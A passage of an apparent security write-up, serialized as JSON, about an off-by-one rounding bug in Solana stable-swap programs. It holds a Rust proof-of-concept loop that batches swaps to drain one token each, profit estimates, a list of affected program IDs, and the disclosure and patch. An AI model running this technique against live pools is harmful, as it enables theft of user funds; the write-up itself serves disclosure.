renBTC.",{"type":24,"tag":291,"props":10199,"children":10201},{"code":10200,"language":9817,"meta":7,"className":9818,"style":7},"// from sbtc to renbtc\nfor i in 0 .. 50u8 {\n // create swap transaction\n let mut swap_instruction = swap(\n &spl_token::id(),\n &swap_pubkey,\n &swap_authority_pubkey,\n &test_account_signer.pubkey(),\n &sbtc_user_account,\n &sbtc_reserve,\n &renbtc_reserve,\n &renbtc_user_account,\n &admin_fee_account_sbtc_to_ren,\n 1,\n 2\n ).unwrap();\n\n // nonce\n swap_instruction.data.append(&mut vec![i, extranonce]);\n\n let mut instructions = vec![];\n\n instructions.push(swap_instruction);\n\n env.execute_as_transaction(&instructions, &vec![&test_account_signer]);\n}\n",[10202],{"type":24,"tag":145,"props":10203,"children":10204},{"__ignoreMap":7},[10205,10213,10254,10262,10291,10319,10335,10351,10376,10392,10408,10424,10440,10456,10468,10476,10497,10504,10512,10579,10586,10615,10622,10651,10658,10717],{"type":24,"tag":301,"props":10206,"children":10207},{"class":303,"line":304},[10208],{"type":24,"tag":301,"props":10209,"children":10210},{"style":1062},[10211],{"type":30,"value":10212},"// from sbtc to renbtc\n",{"type":24,"tag":301,"props":10214,"children":10215},{"class":303,"line":320},[10216,10221,10226,10230,10234,10239,10244,10250],{"type":24,"tag":301,"props":10217,"children":10218},{"style":308},[10219],{"type":30,"value":10220},"for",{"type":24,"tag":301,"props":10222,"children":10223},{"style":369},[10224],{"type":30,"value":10225}," i",{"type":24,"tag":301,"props":10227,"children":10228},{"style":348},[10229],{"type":30,"value":9878},{"type":24,"tag":301,"props":10231,"children":10232},{"style":466},[10233],{"type":30,"value":685},{"type":24,"tag":301,"props":10235,"children":10236},{"style":385},[10237],{"type":30,"value":10238}," ..",{"type":24,"tag":301,"props":10240,"children":10241},{"style":466},[10242],{"type":30,"value":10243}," 50",{"type":24,"tag":301,"props":10245,"children":10247},{"style":10246},"--shiki-default:#4EC9B0",[10248],{"type":30,"value":10249},"u8",{"type":24,"tag":301,"props":10251,"children":10252},{"style":359},[10253],{"type":30,"value":3035},{"type":24,"tag":301,"props":10255,"children":10256},{"class":303,"line":335},[10257],{"type":24,"tag":301,"props":10258,"children":10259},{"style":1062},[10260],{"type":30,"value":10261}," // create swap transaction\n",{"type":24,"tag":301,"props":10263,"children":10264},{"class":303,"line":344},[10265,10269,10273,10278,10282,10287],{"type":24,"tag":301,"props":10266,"children":10267},{"style":348},[10268],{"type":30,"value":9838},{"type":24,"tag":301,"props":10270,"children":10271},{"style":348},[10272],{"type":30,"value":9843},{"type":24,"tag":301,"props":10274,"children":10275},{"style":369},[10276],{"type":30,"value":10277}," swap_instruction",{"type":24,"tag":301,"props":10279,"children":10280},{"style":385},[10281],{"type":30,"value":2537},{"type":24,"tag":301,"props":10283,"children":10284},{"style":314},[10285],{"type":30,"value":10286}," swap",{"type":24,"tag":301,"props":10288,"children":10289},{"style":359},[10290],{"type":30,"value":1707},{"type":24,"tag":301,"props":10292,"children":10293},{"class":303,"line":401},[10294,10299,10304,10309,10314],{"type":24,"tag":301,"props":10295,"children":10296},{"style":385},[10297],{"type":30,"value":10298}," &",{"type":24,"tag":301,"props":10300,"children":10301},{"style":359},[10302],{"type":30,"value":10303},"spl_token",{"type":24,"tag":301,"props":10305,"children":10306},{"style":385},[10307],{"type":30,"value":10308},"::",{"type":24,"tag":301,"props":10310,"children":10311},{"style":314},[10312],{"type":30,"value":10313},"id",{"type":24,"tag":301,"props":10315,"children":10316},{"style":359},[10317],{"type":30,"value":10318},"(),\n",{"type":24,"tag":301,"props":10320,"children":10321},{"class":303,"line":415},[10322,10326,10331],{"type":24,"tag":301,"props":10323,"children":10324},{"style":385},[10325],{"type":30,"value":10298},{"type":24,"tag":301,"props":10327,"children":10328},{"style":369},[10329],{"type":30,"value":10330},"swap_pubkey",{"type":24,"tag":301,"props":10332,"children":10333},{"style":359},[10334],{"type":30,"value":1729},{"type":24,"tag":301,"props":10336,"children":10337},{"class":303,"line":439},[10338,10342,10347],{"type":24,"tag":301,"props":10339,"children":10340},{"style":385},[10341],{"type":30,"value":10298},{"type":24,"tag":301,"props":10343,"children":10344},{"style":369},[10345],{"type":30,"value":10346},"swap_authority_pubkey",{"type":24,"tag":301,"props":10348,"children":10349},{"style":359},[10350],{"type":30,"value":1729},{"type":24,"tag":301,"props":10352,"children":10353},{"class":303,"line":447},[10354,10358,10363,10367,10372],{"type":24,"tag":301,"props":10355,"children":10356},{"style":385},[10357],{"type":30,"value":10298},{"type":24,"tag":301,"props":10359,"children":10360},{"style":369},[10361],{"type":30,"value":10362},"test_account_signer",{"type":24,"tag":301,"props":10364,"children":10365},{"style":385},[10366],{"type":30,"value":206},{"type":24,"tag":301,"props":10368,"children":10369},{"style":314},[10370],{"type":30,"value":10371},"pubkey",{"type":24,"tag":301,"props":10373,"children":10374},{"style":359},[10375],{"type":30,"value":10318},{"type":24,"tag":301,"props":10377,"children":10378},{"class":303,"line":476},[10379,10383,10388],{"type":24,"tag":301,"props":10380,"children":10381},{"style":385},[10382],{"type":30,"value":10298},{"type":24,"tag":301,"props":10384,"children":10385},{"style":369},[10386],{"type":30,"value":10387},"sbtc_user_account",{"type":24,"tag":301,"props":10389,"children":10390},{"style":359},[10391],{"type":30,"value":1729},{"type":24,"tag":301,"props":10393,"children":10394},{"class":303,"line":495},[10395,10399,10404],{"type":24,"tag":301,"props":10396,"children":10397},{"style":385},[10398],{"type":30,"value":10298},{"type":24,"tag":301,"props":10400,"children":10401},{"style":369},[10402],{"type":30,"value":10403},"sbtc_reserve",{"type":24,"tag":301,"props":10405,"children":10406},{"style":359},[10407],{"type":30,"value":1729},{"type":24,"tag":301,"props":10409,"children":10410},{"class":303,"line":504},[10411,10415,10420],{"type":24,"tag":301,"props":10412,"children":10413},{"style":385},[10414],{"type":30,"value":10298},{"type":24,"tag":301,"props":10416,"children":10417},{"style":369},[10418],{"type":30,"value":10419},"renbtc_reserve",{"type":24,"tag":301,"props":10421,"children":10422},{"style":359},[10423],{"type":30,"value":1729},{"type":24,"tag":301,"props":10425,"children":10426},{"class":303,"line":512},[10427,10431,10436],{"type":24,"tag":301,"props":10428,"children":10429},{"style":385},[10430],{"type":30,"value":10298},{"type":24,"tag":301,"props":10432,"children":10433},{"style":369},[10434],{"type":30,"value":10435},"renbtc_user_account",{"type":24,"tag":301,"props":10437,"children":10438},{"style":359},[10439],{"type":30,"value":1729},{"type":24,"tag":301,"props":10441,"children":10442},{"class":303,"line":592},[10443,10447,10452],{"type":24,"tag":301,"props":10444,"children":10445},{"style":385},[10446],{"type":30,"value":10298},{"type":24,"tag":301,"props":10448,"children":10449},{"style":369},[10450],{"type":30,"value":10451},"admin_fee_account_sbtc_to_ren",{"type":24,"tag":301,"props":10453,"children":10454},{"style":359},[10455],{"type":30,"value":1729},{"type":24,"tag":301,"props":10457,"children":10458},{"class":303,"line":619},[10459,10464],{"type":24,"tag":301,"props":10460,"children":10461},{"style":466},[10462],{"type":30,"value":10463}," 1",{"type":24,"tag":301,"props":10465,"children":10466},{"style":359},[10467],{"type":30,"value":1729},{"type":24,"tag":301,"props":10469,"children":10470},{"class":303,"line":635},[10471],{"type":24,"tag":301,"props":10472,"children":10473},{"style":466},[10474],{"type":30,"value":10475}," 2\n",{"type":24,"tag":301,"props":10477,"children":10478},{"class":303,"line":643},[10479,10484,10488,10493],{"type":24,"tag":301,"props":10480,"children":10481},{"style":359},[10482],{"type":30,"value":10483}," )",{"type":24,"tag":301,"props":10485,"children":10486},{"style":385},[10487],{"type":30,"value":206},{"type":24,"tag":301,"props":10489,"children":10490},{"style":314},[10491],{"type":30,"value":10492},"unwrap",{"type":24,"tag":301,"props":10494,"children":10495},{"style":359},[10496],{"type":30,"value":4859},{"type":24,"tag":301,"props":10498,"children":10499},{"class":303,"line":652},[10500],{"type":24,"tag":301,"props":10501,"children":10502},{"emptyLinePlaceholder":16},[10503],{"type":30,"value":341},{"type":24,"tag":301,"props":10505,"children":10506},{"class":303,"line":666},[10507],{"type":24,"tag":301,"props":10508,"children":10509},{"style":1062},[10510],{"type":30,"value":10511}," // nonce\n",{"type":24,"tag":301,"props":10513,"children":10514},{"class":303,"line":674},[10515,10520,10524,10529,10533,10538,10542,10546,10551,10556,10560,10565,10569,10574],{"type":24,"tag":301,"props":10516,"children":10517},{"style":369},[10518],{"type":30,"value":10519}," swap_instruction",{"type":24,"tag":301,"props":10521,"children":10522},{"style":385},[10523],{"type":30,"value":206},{"type":24,"tag":301,"props":10525,"children":10526},{"style":359},[10527],{"type":30,"value":10528},"data",{"type":24,"tag":301,"props":10530,"children":10531},{"style":385},[10532],{"type":30,"value":206},{"type":24,"tag":301,"props":10534,"children":10535},{"style":314},[10536],{"type":30,"value":10537},"append",{"type":24,"tag":301,"props":10539,"children":10540},{"style":359},[10541],{"type":30,"value":362},{"type":24,"tag":301,"props":10543,"children":10544},{"style":385},[10545],{"type":30,"value":556},{"type":24,"tag":301,"props":10547,"children":10548},{"style":348},[10549],{"type":30,"value":10550},"mut",{"type":24,"tag":301,"props":10552,"children":10553},{"style":314},[10554],{"type":30,"value":10555}," vec!",{"type":24,"tag":301,"props":10557,"children":10558},{"style":359},[10559],{"type":30,"value":541},{"type":24,"tag":301,"props":10561,"children":10562},{"style":369},[10563],{"type":30,"value":10564},"i",{"type":24,"tag":301,"props":10566,"children":10567},{"style":359},[10568],{"type":30,"value":377},{"type":24,"tag":301,"props":10570,"children":10571},{"style":369},[10572],{"type":30,"value":10573},"extranonce",{"type":24,"tag":301,"props":10575,"children":10576},{"style":359},[10577],{"type":30,"value":10578},"]);\n",{"type":24,"tag":301,"props":10580,"children":10581},{"class":303,"line":692},[10582],{"type":24,"tag":301,"props":10583,"children":10584},{"emptyLinePlaceholder":16},[10585],{"type":30,"value":341},{"type":24,"tag":301,"props":10587,"children":10588},{"class":303,"line":3631},[10589,10593,10597,10602,10606,10610],{"type":24,"tag":301,"props":10590,"children":10591},{"style":348},[10592],{"type":30,"value":9838},{"type":24,"tag":301,"props":10594,"children":10595},{"style":348},[10596],{"type":30,"value":9843},{"type":24,"tag":301,"props":10598,"children":10599},{"style":369},[10600],{"type":30,"value":10601}," instructions",{"type":24,"tag":301,"props":10603,"children":10604},{"style":385},[10605],{"type":30,"value":2537},{"type":24,"tag":301,"props":10607,"children":10608},{"style":314},[10609],{"type":30,"value":10555},{"type":24,"tag":301,"props":10611,"children":10612},{"style":359},[10613],{"type":30,"value":10614},"[];\n",{"type":24,"tag":301,"props":10616,"children":10617},{"class":303,"line":3639},[10618],{"type":24,"tag":301,"props":10619,"children":10620},{"emptyLinePlaceholder":16},[10621],{"type":30,"value":341},{"type":24,"tag":301,"props":10623,"children":10624},{"class":303,"line":3647},[10625,10630,10634,10638,10642,10647],{"type":24,"tag":301,"props":10626,"children":10627},{"style":369},[10628],{"type":30,"value":10629}," instructions",{"type":24,"tag":301,"props":10631,"children":10632},{"style":385},[10633],{"type":30,"value":206},{"type":24,"tag":301,"props":10635,"children":10636},{"style":314},[10637],{"type":30,"value":4299},{"type":24,"tag":301,"props":10639,"children":10640},{"style":359},[10641],{"type":30,"value":362},{"type":24,"tag":301,"props":10643,"children":10644},{"style":369},[10645],{"type":30,"value":10646},"swap_instruction",{"type":24,"tag":301,"props":10648,"children":10649},{"style":359},[10650],{"type":30,"value":589},{"type":24,"tag":301,"props":10652,"children":10653},{"class":303,"line":3685},[10654],{"type":24,"tag":301,"props":10655,"children":10656},{"emptyLinePlaceholder":16},[10657],{"type":30,"value":341},{"type":24,"tag":301,"props":10659,"children":10660},{"class":303,"line":3713},[10661,10666,10670,10675,10679,10683,10688,10692,10696,10701,10705,10709,10713],{"type":24,"tag":301,"props":10662,"children":10663},{"style":369},[10664],{"type":30,"value":10665}," env",{"type":24,"tag":301,"props":10667,"children":10668},{"style":385},[10669],{"type":30,"value":206},{"type":24,"tag":301,"props":10671,"children":10672},{"style":314},[10673],{"type":30,"value":10674},"execute_as_transaction",{"type":24,"tag":301,"props":10676,"children":10677},{"style":359},[10678],{"type":30,"value":362},{"type":24,"tag":301,"props":10680,"children":10681},{"style":385},[10682],{"type":30,"value":556},{"type":24,"tag":301,"props":10684,"children":10685},{"style":369},[10686],{"type":30,"value":10687},"instructions",{"type":24,"tag":301,"props":10689,"children":10690},{"style":359},[10691],{"type":30,"value":377},{"type":24,"tag":301,"props":10693,"children":10694},{"style":385},[10695],{"type":30,"value":556},{"type":24,"tag":301,"props":10697,"children":10698},{"style":314},[10699],{"type":30,"value":10700},"vec!",{"type":24,"tag":301,"props":10702,"children":10703},{"style":359},[10704],{"type":30,"value":541},{"type":24,"tag":301,"props":10706,"children":10707},{"style":385},[10708],{"type":30,"value":556},{"type":24,"tag":301,"props":10710,"children":10711},{"style":369},[10712],{"type":30,"value":10362},{"type":24,"tag":301,"props":10714,"children":10715},{"style":359},[10716],{"type":30,"value":10578},{"type":24,"tag":301,"props":10718,"children":10719},{"class":303,"line":3721},[10720],{"type":24,"tag":301,"props":10721,"children":10722},{"style":359},[10723],{"type":30,"value":698},{"type":24,"tag":32,"props":10725,"children":10726},{},[10727],{"type":30,"value":10728},"It works!",{"type":24,"tag":9770,"props":10730,"children":10731},{},[10732],{"type":24,"tag":32,"props":10733,"children":10734},{},[10735],{"type":30,"value":10736},"holy shit\nyea, this is big",{"type":24,"tag":32,"props":10738,"children":10739},{},[10740],{"type":24,"tag":177,"props":10741,"children":10743},{"alt":7,"src":10742},"/posts/spl-swap/poc.png",[],{"type":24,"tag":43,"props":10745,"children":10747},{"id":10746},"exploitability",[10748],{"type":30,"value":10749},"Exploitability",{"type":24,"tag":32,"props":10751,"children":10752},{},[10753],{"type":30,"value":10754},"Off-by-one bugs are much easier to exploit on Solana compared to other chains, enabled by the relatively low fees on Solana.",{"type":24,"tag":32,"props":10756,"children":10757},{},[10758],{"type":30,"value":10759},"A single swap on Ethereum can cost dozens of dollars, but on Solana packing hundreds of swap instructions into a single transaction costs the same flat rate of 5000 lamports (at least prior to the 1.9 per transaction size compute limit update).",{"type":24,"tag":32,"props":10761,"children":10762},{},[10763],{"type":30,"value":10764},"This transaction cost discrepancy can trip up developers who transitioned from Ethereum to Solana. For example, the developers who wrote tests for the Solana Program Library implementation of stable swap assumed the impact of an off by one error would be negligible.",{"type":24,"tag":32,"props":10766,"children":10767},{},[10768],{"type":24,"tag":177,"props":10769,"children":10771},{"alt":7,"src":10770},"/posts/spl-swap/pr.png",[],{"type":24,"tag":32,"props":10773,"children":10774},{},[10775,10777,10782],{"type":30,"value":10776},"As we mentioned previously, due to the rounding error, each swap allowed an attacker to steal a single token. It's important to keep in mind that this represents a single token ",{"type":24,"tag":5422,"props":10778,"children":10779},{},[10780],{"type":30,"value":10781},"per instruction",{"type":30,"value":10783},". Transactions on Solana can also contain multiple instructions.",{"type":24,"tag":32,"props":10785,"children":10786},{},[10787],{"type":30,"value":10788},"With an onchain program, we are able to fit over 50 swap instructions per transaction. Each transaction can be run around 3 times before exceeding the per-instruction compute limit cap. Thus, we can pack around 150 invocations per transaction.",{"type":24,"tag":32,"props":10790,"children":10791},{},[10792,10794,10799],{"type":30,"value":10793},"Some quick napkin math confirms that this ",{"type":24,"tag":5422,"props":10795,"children":10796},{},[10797],{"type":30,"value":10798},"is",{"type":30,"value":10800}," indeed profitable. At a price of $41440 per Bitcoin, we are able to steal around 6 cents per transaction.",{"type":24,"tag":32,"props":10802,"children":10803},{},[10804],{"type":24,"tag":145,"props":10805,"children":10809},{"className":10806},[10807,10808],"language-math","math-inline",[10810],{"type":24,"tag":301,"props":10811,"children":10814},{"className":10812},[10813],"katex",[10815],{"type":24,"tag":301,"props":10816,"children":10820},{"className":10817,"ariaHidden":10819},[10818],"katex-html","true",[10821,10928,10984,11024],{"type":24,"tag":301,"props":10822,"children":10825},{"className":10823},[10824],"base",[10826,10832,10838,10901,10911,10917,10924],{"type":24,"tag":301,"props":10827,"children":10831},{"className":10828,"style":10830},[10829],"strut","height:0.8141em;",[],{"type":24,"tag":301,"props":10833,"children":10836},{"className":10834},[10835],"mord",[10837],{"type":30,"value":546},{"type":24,"tag":301,"props":10839,"children":10841},{"className":10840},[10835],[10842,10847],{"type":24,"tag":301,"props":10843,"children":10845},{"className":10844},[10835],[10846],{"type":30,"value":584},{"type":24,"tag":301,"props":10848,"children":10851},{"className":10849},[10850],"msupsub",[10852],{"type":24,"tag":301,"props":10853,"children":10856},{"className":10854},[10855],"vlist-t",[10857],{"type":24,"tag":301,"props":10858,"children":10861},{"className":10859},[10860],"vlist-r",[10862],{"type":24,"tag":301,"props":10863,"children":10866},{"className":10864,"style":10830},[10865],"vlist",[10867],{"type":24,"tag":301,"props":10868,"children":10870},{"style":10869},"top:-3.063em;margin-right:0.05em;",[10871,10877],{"type":24,"tag":301,"props":10872,"children":10876},{"className":10873,"style":10875},[10874],"pstrut","height:2.7em;",[],{"type":24,"tag":301,"props":10878,"children":10884},{"className":10879},[10880,10881,10882,10883],"sizing","reset-size6","size3","mtight",[10885],{"type":24,"tag":301,"props":10886,"children":10888},{"className":10887},[10835,10883],[10889,10895],{"type":24,"tag":301,"props":10890,"children":10892},{"className":10891},[10835,10883],[10893],{"type":30,"value":10894},"−",{"type":24,"tag":301,"props":10896,"children":10898},{"className":10897},[10835,10883],[10899],{"type":30,"value":10900},"8",{"type":24,"tag":301,"props":10902,"children":10904},{"className":10903},[10835,30],[10905],{"type":24,"tag":301,"props":10906,"children":10908},{"className":10907},[10835],[10909],{"type":30,"value":10910}," BTC",{"type":24,"tag":301,"props":10912,"children":10916},{"className":10913,"style":10915},[10914],"mspace","margin-right:0.2222em;",[],{"type":24,"tag":301,"props":10918,"children":10921},{"className":10919},[10920],"mbin",[10922],{"type":30,"value":10923},"∗",{"type":24,"tag":301,"props":10925,"children":10927},{"className":10926,"style":10915},[10914],[],{"type":24,"tag":301,"props":10929,"children":10931},{"className":10930},[10824],[10932,10937,10943,10950,10955,10961,10971,10975,10980],{"type":24,"tag":301,"props":10933,"children":10936},{"className":10934,"style":10935},[10829],"height:1em;vertical-align:-0.25em;",[],{"type":24,"tag":301,"props":10938,"children":10940},{"className":10939},[10835],[10941],{"type":30,"value":10942},"$41",{"type":24,"tag":301,"props":10944,"children":10947},{"className":10945},[10946],"mpunct",[10948],{"type":30,"value":10949},",",{"type":24,"tag":301,"props":10951,"children":10954},{"className":10952,"style":10953},[10914],"margin-right:0.1667em;",[],{"type":24,"tag":301,"props":10956,"children":10958},{"className":10957},[10835],[10959],{"type":30,"value":10960},"400/",{"type":24,"tag":301,"props":10962,"children":10964},{"className":10963},[10835,30],[10965],{"type":24,"tag":301,"props":10966,"children":10968},{"className":10967},[10835],[10969],{"type":30,"value":10970},"BTC",{"type":24,"tag":301,"props":10972,"children":10974},{"className":10973,"style":10915},[10914],[],{"type":24,"tag":301,"props":10976,"children":10978},{"className":10977},[10920],[10979],{"type":30,"value":10923},{"type":24,"tag":301,"props":10981,"children":10983},{"className":10982,"style":10915},[10914],[],{"type":24,"tag":301,"props":10985,"children":10987},{"className":10986},[10824],[10988,10993,10999,11009,11014,11020],{"type":24,"tag":301,"props":10989,"children":10992},{"className":10990,"style":10991},[10829],"height:0.8389em;vertical-align:-0.1944em;",[],{"type":24,"tag":301,"props":10994,"children":10996},{"className":10995},[10835],[10997],{"type":30,"value":10998},"150",{"type":24,"tag":301,"props":11000,"children":11002},{"className":11001},[10835,30],[11003],{"type":24,"tag":301,"props":11004,"children":11006},{"className":11005},[10835],[11007],{"type":30,"value":11008}," swaps",{"type":24,"tag":301,"props":11010,"children":11013},{"className":11011,"style":11012},[10914],"margin-right:0.2778em;",[],{"type":24,"tag":301,"props":11015,"children":11018},{"className":11016},[11017],"mrel",[11019],{"type":30,"value":523},{"type":24,"tag":301,"props":11021,"children":11023},{"className":11022,"style":11012},[10914],[],{"type":24,"tag":301,"props":11025,"children":11027},{"className":11026},[10824],[11028,11033],{"type":24,"tag":301,"props":11029,"children":11032},{"className":11030,"style":11031},[10829],"height:0.8056em;vertical-align:-0.0556em;",[],{"type":24,"tag":301,"props":11034,"children":11036},{"className":11035},[10835],[11037],{"type":30,"value":11038},"$0.0621",{"type":24,"tag":32,"props":11040,"children":11041},{},[11042],{"type":30,"value":11043},"At 200 transactions per second, we can extract just over a million dollars per day.",{"type":24,"tag":32,"props":11045,"children":11046},{},[11047],{"type":30,"value":11048},"We're well on our way to becoming a millionaire!",{"type":24,"tag":43,"props":11050,"children":11052},{"id":11051},"patch",[11053],{"type":30,"value":11054},"Patch",{"type":24,"tag":32,"props":11056,"children":11057},{},[11058],{"type":30,"value":11059},"Now that we had a proof-of-concept going, it was time to contact the relevant teams.",{"type":24,"tag":32,"props":11061,"children":11062},{},[11063],{"type":30,"value":11064},"By grepping through Solana logs for the swap instruction log, we were able to identify many potential spl-token-swap forks.",{"type":24,"tag":291,"props":11066,"children":11070},{"code":11067,"language":11068,"meta":7,"className":11069,"style":7},"solana logs -um | grep 'Instruction: Swap' -B1\n","bash","language-bash shiki shiki-themes slack-dark",[11071],{"type":24,"tag":145,"props":11072,"children":11073},{"__ignoreMap":7},[11074],{"type":24,"tag":301,"props":11075,"children":11076},{"class":303,"line":304},[11077,11081,11086,11091,11096,11101,11106],{"type":24,"tag":301,"props":11078,"children":11079},{"style":314},[11080],{"type":30,"value":9717},{"type":24,"tag":301,"props":11082,"children":11083},{"style":329},[11084],{"type":30,"value":11085}," logs",{"type":24,"tag":301,"props":11087,"children":11088},{"style":329},[11089],{"type":30,"value":11090}," -um",{"type":24,"tag":301,"props":11092,"children":11093},{"style":385},[11094],{"type":30,"value":11095}," |",{"type":24,"tag":301,"props":11097,"children":11098},{"style":314},[11099],{"type":30,"value":11100}," grep",{"type":24,"tag":301,"props":11102,"children":11103},{"style":329},[11104],{"type":30,"value":11105}," 'Instruction: Swap'",{"type":24,"tag":301,"props":11107,"children":11108},{"style":329},[11109],{"type":30,"value":11110}," -B1\n",{"type":24,"tag":32,"props":11112,"children":11113},{},[11114],{"type":30,"value":11115},"With some Google dorking, we were able to identify many of these programs.",{"type":24,"tag":291,"props":11117,"children":11119},{"code":11118},"1SoLTvbiicqXZ3MJmnTL2WYXKLYpuxwHpa4yYrVQaMZ - \"1 SOL\"\n9W959DqEETiGZocYWCQPaJ6sBmUzgfxXfqGeTEdp3aQP - Orca Swap Program v2\nSCHAtsf8mbjyjiv4LkhLKutTf6JnZAbdJKFkXQNMFHZ - \"Sencha Swap\"\nSSwapUtytfBdBn1b9NUGG6foMVPtcWgpRU32HToDUZr - \"Saros Swap\"\nSSwpkEEcbUqx4vtoEByFjSkhKdCT862DNVb52nZg1UZ - Saber Stable Swap Program\nSSwpMgqNDsyV7mAgN9ady4bDVu5ySjmmXejXvy2vLt1 - Step Finance Swap Program\nSwaPpA9LAaLfeLi3a68M4DjnLqgtticKg6CnyNwgAC8 - Swap Program\n",[11120],{"type":24,"tag":145,"props":11121,"children":11122},{"__ignoreMap":7},[11123],{"type":30,"value":11118},{"type":24,"tag":32,"props":11125,"children":11126},{},[11127],{"type":30,"value":11128},"Now it was time to contact these teams.",{"type":24,"tag":32,"props":11130,"children":11131},{},[11132],{"type":30,"value":11133},"Of these protocols, Saber was the only one which had BTC stable swaps, which would make exploitation immediately profitable. Luckily, they were also the most responsive, triaging and patching the vulnerability in just over one day.",{"type":24,"tag":32,"props":11135,"children":11136},{},[11137],{"type":30,"value":11138},"After some discussion, they decided to port a patch from Curve.fi, subtracting one from the output amount.",{"type":24,"tag":291,"props":11140,"children":11142},{"code":11141,"language":9817,"meta":7,"className":9818,"style":7},"- let dy = swap_destination_amount.checked_sub(y)?;\n+ // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n+ let dy = swap_destination_amount.checked_sub(y)?.checked_sub(1)?;\n",[11143],{"type":24,"tag":145,"props":11144,"children":11145},{"__ignoreMap":7},[11146,11199,11212],{"type":24,"tag":301,"props":11147,"children":11148},{"class":303,"line":304},[11149,11153,11157,11162,11166,11171,11175,11179,11183,11187,11191,11195],{"type":24,"tag":301,"props":11150,"children":11151},{"style":385},[11152],{"type":30,"value":9253},{"type":24,"tag":301,"props":11154,"children":11155},{"style":348},[11156],{"type":30,"value":9900},{"type":24,"tag":301,"props":11158,"children":11159},{"style":369},[11160],{"type":30,"value":11161}," dy",{"type":24,"tag":301,"props":11163,"children":11164},{"style":385},[11165],{"type":30,"value":2537},{"type":24,"tag":301,"props":11167,"children":11168},{"style":369},[11169],{"type":30,"value":11170}," swap_destination_amount",{"type":24,"tag":301,"props":11172,"children":11173},{"style":385},[11174],{"type":30,"value":206},{"type":24,"tag":301,"props":11176,"children":11177},{"style":314},[11178],{"type":30,"value":10066},{"type":24,"tag":301,"props":11180,"children":11181},{"style":359},[11182],{"type":30,"value":362},{"type":24,"tag":301,"props":11184,"children":11185},{"style":369},[11186],{"type":30,"value":9948},{"type":24,"tag":301,"props":11188,"children":11189},{"style":359},[11190],{"type":30,"value":9961},{"type":24,"tag":301,"props":11192,"children":11193},{"style":385},[11194],{"type":30,"value":2003},{"type":24,"tag":301,"props":11196,"children":11197},{"style":359},[11198],{"type":30,"value":492},{"type":24,"tag":301,"props":11200,"children":11201},{"class":303,"line":320},[11202,11207],{"type":24,"tag":301,"props":11203,"children":11204},{"style":385},[11205],{"type":30,"value":11206},"+",{"type":24,"tag":301,"props":11208,"children":11209},{"style":1062},[11210],{"type":30,"value":11211}," // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n",{"type":24,"tag":301,"props":11213,"children":11214},{"class":303,"line":335},[11215,11219,11223,11227,11231,11235,11239,11243,11247,11251,11255,11259,11263,11267,11271,11275,11279],{"type":24,"tag":301,"props":11216,"children":11217},{"style":385},[11218],{"type":30,"value":11206},{"type":24,"tag":301,"props":11220,"children":11221},{"style":348},[11222],{"type":30,"value":9900},{"type":24,"tag":301,"props":11224,"children":11225},{"style":369},[11226],{"type":30,"value":11161},{"type":24,"tag":301,"props":11228,"children":11229},{"style":385},[11230],{"type":30,"value":2537},{"type":24,"tag":301,"props":11232,"children":11233},{"style":369},[11234],{"type":30,"value":11170},{"type":24,"tag":301,"props":11236,"children":11237},{"style":385},[11238],{"type":30,"value":206},{"type":24,"tag":301,"props":11240,"children":11241},{"style":314},[11242],{"type":30,"value":10066},{"type":24,"tag":301,"props":11244,"children":11245},{"style":359},[11246],{"type":30,"value":362},{"type":24,"tag":301,"props":11248,"children":11249},{"style":369},[11250],{"type":30,"value":9948},{"type":24,"tag":301,"props":11252,"children":11253},{"style":359},[11254],{"type":30,"value":9961},{"type":24,"tag":301,"props":11256,"children":11257},{"style":385},[11258],{"type":30,"value":9966},{"type":24,"tag":301,"props":11260,"children":11261},{"style":314},[11262],{"type":30,"value":10066},{"type":24,"tag":301,"props":11264,"children":11265},{"style":359},[11266],{"type":30,"value":362},{"type":24,"tag":301,"props":11268,"children":11269},{"style":466},[11270],{"type":30,"value":546},{"type":24,"tag":301,"props":11272,"children":11273},{"style":359},[11274],{"type":30,"value":9961},{"type":24,"tag":301,"props":11276,"children":11277},{"style":385},[11278],{"type":30,"value":2003},{"type":24,"tag":301,"props":11280,"children":11281},{"style":359},[11282],{"type":30,"value":492},{"type":24,"tag":32,"props":11284,"children":11285},{},[11286,11288,11295],{"type":30,"value":11287},"For reference, here is the ",{"type":24,"tag":188,"props":11289,"children":11292},{"href":11290,"rel":11291},"https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466",[192],[11293],{"type":30,"value":11294},"Curve.fi implementation",{"type":30,"value":206},{"type":24,"tag":291,"props":11297,"children":11301},{"code":11298,"language":11299,"meta":7,"className":11300,"style":7}," dy: uint256 = xp[j] - y - 1 # -1 just in case there were some rounding errors\n dy_fee: uint256 = dy * self.fee / FEE_DENOMINATOR\n","solidity","language-solidity shiki shiki-themes slack-dark",[11302],{"type":24,"tag":145,"props":11303,"children":11304},{"__ignoreMap":7},[11305,11366],{"type":24,"tag":301,"props":11306,"children":11307},{"class":303,"line":304},[11308,11313,11317,11322,11326,11331,11335,11340,11344,11348,11353,11357,11361],{"type":24,"tag":301,"props":11309,"children":11310},{"style":359},[11311],{"type":30,"value":11312}," dy",{"type":24,"tag":301,"props":11314,"children":11315},{"style":385},[11316],{"type":30,"value":1679},{"type":24,"tag":301,"props":11318,"children":11319},{"style":10246},[11320],{"type":30,"value":11321}," uint256",{"type":24,"tag":301,"props":11323,"children":11324},{"style":385},[11325],{"type":30,"value":2537},{"type":24,"tag":301,"props":11327,"children":11328},{"style":359},[11329],{"type":30,"value":11330}," xp[j] ",{"type":24,"tag":301,"props":11332,"children":11333},{"style":385},[11334],{"type":30,"value":9253},{"type":24,"tag":301,"props":11336,"children":11337},{"style":359},[11338],{"type":30,"value":11339}," y ",{"type":24,"tag":301,"props":11341,"children":11342},{"style":385},[11343],{"type":30,"value":9253},{"type":24,"tag":301,"props":11345,"children":11346},{"style":466},[11347],{"type":30,"value":487},{"type":24,"tag":301,"props":11349,"children":11350},{"style":359},[11351],{"type":30,"value":11352}," # ",{"type":24,"tag":301,"props":11354,"children":11355},{"style":385},[11356],{"type":30,"value":9253},{"type":24,"tag":301,"props":11358,"children":11359},{"style":466},[11360],{"type":30,"value":546},{"type":24,"tag":301,"props":11362,"children":11363},{"style":359},[11364],{"type":30,"value":11365}," just in case there were some rounding 